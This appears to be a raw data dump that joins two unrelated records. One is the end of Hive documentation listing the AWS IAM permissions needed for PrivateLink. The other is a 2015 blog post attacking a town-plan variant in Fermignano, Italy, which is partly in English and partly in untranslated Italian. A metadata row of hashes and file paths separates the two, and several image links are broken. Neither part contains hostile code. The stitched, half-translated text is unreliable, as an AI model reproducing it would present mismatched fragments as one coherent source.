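  platform:
    aws:
      region: us-east-1          # must be a region enabled in HiveConfig
      credentialsSecretRef:
        name: example-aws-creds  # hypothetical credentials secret
      privateLink:
        enabled: true
  provisioning:
    installConfigSecretRef:
      name: example-install-config  # hypothetical install-config secret
    imageSetRef:
      name: example-imageset        # hypothetical ClusterImageSet
```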
The controller provides progress and failure updates using `AWSPrivateLinkReady` and
`AWSPrivateLinkFailed` conditions on the ClusterDeployment.
## Permissions required for AWS Private Link
There are multiple credentials involved in configuring AWS Private Link, and there are different
expectations of required permissions for these credentials.
1. The credentials on ClusterDeployment
The following permissions are required:
```txt
ec2:CreateVpcEndpointServiceConfiguration
ec2:DescribeVpcEndpointServiceConfigurations
ec2:ModifyVpcEndpointServiceConfiguration
ec2:DescribeVpcEndpointServicePermissions
ec2:ModifyVpcEndpointServicePermissions
ec2:DeleteVpcEndpointServiceConfigurations
```
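Expressed as an IAM policy document, the list above might look like the following sketch; the wildcard `Resource` scope is an assumption and should be tightened for a real deployment:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "ec2:CreateVpcEndpointServiceConfiguration",
        "ec2:DescribeVpcEndpointServiceConfigurations",
        "ec2:ModifyVpcEndpointServiceConfiguration",
        "ec2:DescribeVpcEndpointServicePermissions",
        "ec2:ModifyVpcEndpointServicePermissions",
        "ec2:DeleteVpcEndpointServiceConfigurations"
      ],
      "Resource": "*"
    }
  ]
}
```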
2. The credentials specified in HiveConfig for endpoint VPCs account `.spec.awsPrivateLink.credentialsSecretRef`
The following permissions are required:
```txt
ec2:DescribeVpcEndpointServices
ec2:DescribeVpcEndpoints
ec2:CreateVpcEndpoint
ec2:CreateTags
ec2:DescribeVPCs
ec2:DeleteVpcEndpoints
route53:CreateHostedZone
route53:GetHostedZone
route53:ListHostedZonesByVPC
route53:AssociateVPCWithHostedZone
route53:DisassociateVPCFromHostedZone
route53:CreateVPCAssociationAuthorization
route53:DeleteVPCAssociationAuthorization
route53:ListResourceRecordSets
route53:ChangeResourceRecordSets
route53:DeleteHostedZone
```
3. The credentials specified in HiveConfig for associating VPCs to the Private Hosted Zone.
`.spec.awsPrivateLink.associatedVPCs[$idx].credentialsSecretRef`
The following permissions are required in the account where the VPC exists:
```txt
route53:AssociateVPCWithHostedZone
route53:DisassociateVPCFromHostedZone
ec2:DescribeVPCs
```
[aws-private-link-overview]: https://docs.aws.amazon.com/vpc/latest/privatelink/endpoint-services-overview.html
[control-access-vpc-endpoint]: https://docs.aws.amazon.com/vpc/latest/privatelink/vpc-endpoints-access.html#vpc-endpoints-security-groups
| 38.008772 | 137 | 0.728018 | eng_Latn | 0.9738 |
61de51046ae1545a18c7d6484e8d6cc9855828f6 | 7,507 | markdown | Markdown | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | ---
author: parides17
comments: true
date: 2015-05-25 07:11:14+00:00
layout: post
slug: la-nuova-variante-al-prg
title: The True Face of the New Variant to the PRG
wordpress_id: 1737
categories:
- Ambiente
---
_**[](/images/2015/06/studio-piano-regolatore-2015.jpg)The much-touted “environmentalist turn” is in reality an indiscriminate monetization of land.**_
On 26 February 2015 the City Council presented the 2014 Variant to the General Town Plan (PRG), and already the next day town criers and minstrels were talking about an “environmentalist turn” by the Cancellieri administration.
A “green revolution” was proclaimed, with which the administration planned more downgrades than new building rights and, above all, removed a large area from the artisanal zone of San Silvestro.
However, since well-founded opinions are built not on village gossip but on documents, we went and read the more than 150 pages of the Variant to see for ourselves, and **what emerges is anything but an ecological revolution**.
Given the seriousness of the intervention, we considered it essential to submit our Observations on the Variant to the PRG (filed on 15/05/2015), in an attempt to keep the administration from making irreparable mistakes.
As the Urban Planning Report itself notes, the total land area of the plots from which this Variant removes the “buildable” label, restoring the “agricultural/green” one, is larger than the area that, conversely, goes from “agricultural/green” to “buildable”.
This figure, however, is the result of a sterile mathematical calculation that **takes no account of the characteristics of the plots affected by the Variant**: their size, their position, and their real usability for agriculture.
[](/images/2015/05/SanSilvestro.jpg)Questo “giochetto” è evidente nella retrocessione attuata nell'area artigianale di San Silvestro e la nuova edificabilità inserita nella zona industriale di Fermignano. In sede di presentazione della Variante, l'amministrazione ha giustificato questa nuova ampia cementificazione nella zona industriale spiegando che non stavano facendo altro che spostare un'area edificabile dalla zona artigianale di San Silvestro a quella di Fermignano, nell'ottica di bloccare l'espansione a San Silvestro e sfruttare invece il polo industriale cittadino già esistente. Peccato però che, nella realtà dei fatti, quella di San Silvestro sia una “finta retrocessione”. Sulla carta quel terreno è sì tornato “agricolo”, ma per la **quasi totalità è già coperto di pannelli fotovoltaici!
**
E' noto che l'installazione di **impianti fotovoltaici sul suolo modificano le caratteristiche organiche e biologiche del terreno, compromettendo la sua fertilità**. Ciò che invece non si sa ancora con certezza è quanti anni e quanti soldi serviranno per far tornare fertile un terreno oggi coperto di pannelli fotovoltaici. E' evidente come non c'è alcuna svolta ambientalista, non c'è alcun risparmio di suolo, ma solo una nuova area fabbricabile nella zona industriale di Fermignano e un **terreno a San Silvestro che di “agricolo” ha solo il nome**.
[](/images/2015/05/capaino.jpg)Ma l'intervento che spazza via ogni dubbio circa la sensibilità verso l'ambiente di questa Variante è certamente quello che interessa le zone di Ca' La Vittoria e Ca' Paino, che si sostanzia in una vera e propria **devastazione ambientale**.
Stiamo parlando delle **aree che costeggiano la lunga strada pedonale che conduce al cimitero**. Una strada utilizzata da tutta la popolazione perché è sicura, in quanto non trafficata dalle auto, e perché è bella, costeggiata da un paesaggio rurale che la rende l'unica all'interno del paese adatta a fare sport e lunghe passeggiate. Ed è per questo che tutta la popolazione la frequenta quotidianamente.
Non si capisce per quale motivo, quindi, **l'amministrazione abbia voluto infliggere un tale schiaffo ai propri cittadini**. Di quale schiaffo stiamo parlando? Nelle aree che costeggiano la strada che conduce al cimitero oggi ci sono dei bellissimi terreni agricoli: **la nuova Variante li spazza via per permettere la costruzione di due lunghe schiere di edifici residenziali**.
**Il risultato è un enorme danno alla popolazione che viene così privata di un importante e frequentatissimo luogo di svago e aggregazione**. Ma il danno è grave anche in termini urbanistici, perché questo intervento cementificherebbe uno dei più belli e importanti ingressi del paese.
[](/images/2015/05/osservazioni.jpg)Potremmo continuare a scrivere fiumi di parole per descrivervi questa Variante demolitrice, ma ci siamo prefissi di essere brevi (**[qui trovate il documento integrale delle Osservazioni da noi presentate](/images/2015/05/Osservazioni-Variante-PRG.pdf)**).
One last thing, though, we do want to say: we have come to suspect that this Variant even betrays the very purpose of a PRG.
The General Town Plan (PRG) is an instrument that regulates the transformation of the municipal territory, and therefore the building activity that may take place within it, with the aim of planning the expansion and development of an urban area in a coherent, sensible and structured way.
That coherence and planning, however, are hard to see in this Variant, or at least we cannot see them. It seems to us, rather, that the only plan is an indiscriminate monetization of land: trying to swell the municipal coffers with taxes on buildable plots and development works.
It might even be a hallucination of ours, since **it seems impossible that a serious, far-sighted administration, aware that concreted-over soil takes almost five centuries to regenerate and become usable again for agriculture, could pursue such a policy**. And yet no motivation for such a choice can be found that is consistent with the nature of a General Town Plan.
The task of a PRG is to forecast the development of a population, of a territory and of its economy, and on the basis of these parameters to set the guidelines for the interventions that can be carried out within it, both by the administration for the community (public works) and by private citizens (private building).
In this respect the new Variant is bewildering: **with so many buildings (residential, productive and commercial) standing empty because they remain unlet and unsold**, it is unclear what forecasts of economic and demographic growth led the administration to insert so many new building rights. Are we expecting an invasion?
Given the relentless spread of land consumption in Fermignano over recent decades, **an environmentalist turn is necessary**.
But a real environmentalist turn is made differently: everything that already exists must be requalified and put to use. Renovating and recovering old buildings must become the priority. Interventions that improve the energy efficiency of old buildings should be encouraged, including through discounts on municipal taxes, along with the production of energy from renewable sources, cycle accessibility and the use of public transport services.
| 100.093333 | 855 | 0.812442 | ita_Latn | 0.999713 |